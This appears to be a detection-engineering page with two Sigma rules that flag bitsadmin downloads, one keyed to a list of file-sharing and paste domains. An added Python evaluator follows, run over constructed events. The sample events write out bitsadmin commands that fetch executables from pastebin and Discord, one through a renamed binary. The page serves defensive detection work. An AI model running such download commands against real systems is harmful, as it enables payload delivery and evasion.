Techniques
Sample rules
Suspicious Download From File-Sharing Website Via Bitsadmin
- source: sigma
- techniques:
  - t1036
  - t1036.003
  - t1197
Description
Detects usage of bitsadmin downloading a file from a suspicious domain
Detection logic
condition: all of selection_*
selection_domain:
  CommandLine|contains:
    - .githubusercontent.com
    - anonfiles.com
    - cdn.discordapp.com
    - ddns.net
    - dl.dropboxusercontent.com
    - ghostbin.co
    - glitch.me
    - gofile.io
    - hastebin.com
    - mediafire.com
    - mega.nz
    - onrender.com
    - pages.dev
    - paste.ee
    - pastebin.com
    - pastebin.pl
    - pastetext.net
    - privatlab.com
    - privatlab.net
    - send.exploit.in
    - sendspace.com
    - storage.googleapis.com
    - storjshare.io
    - supabase.co
    - temp.sh
    - transfer.sh
    - trycloudflare.com
    - ufile.io
    - w3spaces.com
    - workers.dev
selection_flags:
  CommandLine|contains:
    - ' /transfer '
    - ' /create '
    - ' /addfile '
selection_img:
  - Image|endswith: \bitsadmin.exe
  - OriginalFileName: bitsadmin.exe
File Download Via Bitsadmin
- source: sigma
- techniques:
  - t1036
  - t1036.003
  - t1197
Description
Detects usage of bitsadmin downloading a file
Detection logic
condition: selection_img and (selection_cmd or all of selection_cli_*)
selection_cli_1:
  CommandLine|contains:
    - ' /create '
    - ' /addfile '
selection_cli_2:
  CommandLine|contains: http
selection_cmd:
  CommandLine|contains: ' /transfer '
selection_img:
  - Image|endswith: \bitsadmin.exe
  - OriginalFileName: bitsadmin.exe
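Evaluating both rules above against sample process-creation events, as an added example that is not part of the original page or the Sigma project: the selections are transcribed into Python (the domain list reduced to a subset), Sigma's case-insensitive matching and its AND-within-mapping / OR-within-list semantics are implemented by hand, and the events are constructed, not real telemetry.

```python
# Added example, not from the Sigma project: a minimal evaluator for the two rules
# above, run over constructed Sysmon-style process-creation events.
def field_match(event, key, values):
    """One Sigma field 'Name|modifier'; a list of values is OR-ed, matching is case-insensitive."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    for v in (values if isinstance(values, list) else [values]):
        v = str(v).lower()
        if {"contains": v in actual, "endswith": actual.endswith(v), "": actual == v}.get(modifier):
            return True
    return False

def selection_match(event, selection):
    """A mapping ANDs its fields; a list of mappings ORs its entries."""
    if isinstance(selection, list):
        return any(selection_match(event, s) for s in selection)
    return all(field_match(event, k, v) for k, v in selection.items())

# Selections transcribed from the rules above (the domain list is abbreviated to a subset).
SEL_IMG = [{"Image|endswith": r"\bitsadmin.exe"}, {"OriginalFileName": "bitsadmin.exe"}]
SEL_DOMAIN = {"CommandLine|contains": ["pastebin.com", "cdn.discordapp.com", "transfer.sh", "mega.nz"]}
SEL_FLAGS = {"CommandLine|contains": [" /transfer ", " /create ", " /addfile "]}
SEL_CLI_1 = {"CommandLine|contains": [" /create ", " /addfile "]}
SEL_CLI_2 = {"CommandLine|contains": "http"}
SEL_CMD = {"CommandLine|contains": " /transfer "}

def suspicious_download_from_file_sharing(event):
    """condition: all of selection_*"""
    return all(selection_match(event, s) for s in (SEL_DOMAIN, SEL_FLAGS, SEL_IMG))

def file_download_via_bitsadmin(event):
    """condition: selection_img and (selection_cmd or all of selection_cli_*)"""
    return selection_match(event, SEL_IMG) and (selection_match(event, SEL_CMD)
        or all(selection_match(event, s) for s in (SEL_CLI_1, SEL_CLI_2)))

SAMPLE_EVENTS = {  # constructed events with only the fields the rules read
    "transfer_pastebin": {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /transfer job /download https://pastebin.com/raw/abc C:\Users\Public\a.exe"},
    "addfile_internal": {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin /addfile upd http://intranet.local/f.msi C:\Temp\f.msi"},
    "renamed_copy": {"Image": r"C:\Users\Public\svc.exe", "OriginalFileName": "bitsadmin.exe",  # PE name still matches
        "CommandLine": r"svc.exe /transfer j https://cdn.discordapp.com/attachments/1/2/p.exe C:\Temp\p.exe"},
    "not_bitsadmin": {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
        "CommandLine": "curl https://pastebin.com/raw/abc -o a.txt"},
}

def evaluate(events=SAMPLE_EVENTS):  # -> {name: (suspicious_domain_hit, file_download_hit)}
    return {n: (suspicious_download_from_file_sharing(e), file_download_via_bitsadmin(e)) for n, e in events.items()}
```

The renamed_copy event shows why selection_img also checks OriginalFileName: a renamed binary fails the Image check but the PE header name (T1036.003) still matches, while addfile_internal fires only the broader rule because its host is not on the domain list.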